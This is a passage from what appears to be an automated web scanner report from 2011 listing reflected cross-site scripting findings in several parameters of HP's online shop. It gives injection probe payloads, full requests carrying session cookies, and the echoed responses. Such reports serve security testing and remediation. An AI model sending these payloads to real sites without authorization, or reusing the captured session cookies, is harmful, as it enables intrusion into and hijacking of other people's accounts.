omni_category = 'ipaqs';

var omni_storeName = 'computer_store326dc';b71c7de3e6a';
if(omni_storeName != 'null' && omni_storeName == 'accessories')
omni_category = 'accessories';

//PVCS Fix #23261
if(omni_storeName != null && omni_storeName == 'com
...[SNIP]...

1.48. http://www.shopping.hp.com/webapp/shopping/product_detail.do [storeName parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the storeName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf6c0"%20a%3db%20ccf25002201 was submitted in the storeName parameter. This input was echoed as cf6c0" a=b ccf25002201 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_storecf6c0"%20a%3db%20ccf25002201&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:26 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=mtLjT6KGYHkh3nxQ47sNsB02TnVRcd2kMSwZ2DRZvTLvQRXyhcLf!-1039217636; expires=Friday, 23-Sep-2011 01:09:27 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:27 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:27 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224770

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<a href="/desktops/p7xt_series/1/computer_storecf6c0" a=b ccf25002201">
...[SNIP]...

1.49. http://www.shopping.hp.com/webapp/shopping/product_detail.do [subcat1 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the subcat1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e422b'%3bbd2c2a0ec7d was submitted in the subcat1 parameter. This input was echoed as e422b';bd2c2a0ec7d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rtse422b'%3bbd2c2a0ec7d&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:18 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:18 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:18 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
// Commented out below lines to remove directLink
var omni_landing = 'desktops';
var omni_category = 'p7xt_series';
var omni_catLevel = '3';
var omni_subcat1 = 'rtse422b';bd2c2a0ec7d';

//Script added to introduce New Omniture Variables
if(omni_landing == null || omni_landing == '' || omni_landing == 'null')
omni_landing = '';
if(omni_category == n
...[SNIP]...

1.50. http://www.shopping.hp.com/webapp/shopping/product_detail.do [subcat1 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the subcat1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b83"%20a%3db%20c0af24b7873 was submitted in the subcat1 parameter. This input was echoed as f3b83" a=b c0af24b7873 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rtsf3b83"%20a%3db%20c0af24b7873&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:12 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:12 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:12 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222667

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
ReadReviewsLink" style="display:none;" href="javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rtsf3b83" a=b c0af24b7873&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');" title="javascript:retrieveURL('htt
...[SNIP]...

1.51. http://www.shopping.hp.com/webapp/shopping/product_detail.do [subcat1 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the subcat1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab48"%3b1751e390864 was submitted in the subcat1 parameter. This input was echoed as 1ab48";1751e390864 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts1ab48"%3b1751e390864&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:15 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:16 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:16 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
readReviewsLink() {
return "javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rts1ab48";1751e390864&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');";
}
//-->
...[SNIP]...

1.52. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b5cf"%20a%3db%20e97581269ec was submitted in the tab parameter. This input was echoed as 9b5cf" a=b e97581269ec in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /webapp/shopping/product_detail.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 137
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; 
